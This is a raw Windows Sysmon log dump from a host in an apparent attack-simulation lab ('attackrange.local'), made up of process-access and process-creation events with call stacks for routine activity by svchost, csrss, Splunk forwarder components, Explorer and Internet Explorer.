13:42:19.942{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014220Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:19.942{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014219Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:19.942{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014218Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:19.942{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014217Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:19.942{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4A3B-6000-9205-000000009A01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014216Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:19.942{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4A3B-6000-9205-000000009A01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014215Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:19.942{08A6967A-4A3B-6000-9205-000000009A01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014214Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:19.020{08A6967A-4A3A-6000-9105-000000009A01}32802876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014229Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:42.302{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014228Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:42.270{08A6967A-4754-6000-1705-000000009A01}34082188C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+2fd1a|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014227Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:42.270{08A6967A-4754-6000-1705-000000009A01}34082188C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+3007c|C:\Windows\Explorer.EXE+30028|C:\Windows\Explorer.EXE+2fccc|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014226Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:42.270{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa08(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1ba9bf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1ba966(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a8abf(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b324e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b319b(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d11d0(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+50ec20(wow64) 10341000x800000000000000014225Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:42.270{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014224Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:42.255{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014223Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:42.239{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014258Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014257Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014256Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014255Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014254Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014253Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014252Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014251Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014250Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014249Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014248Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014247Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014246Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014245Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014244Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 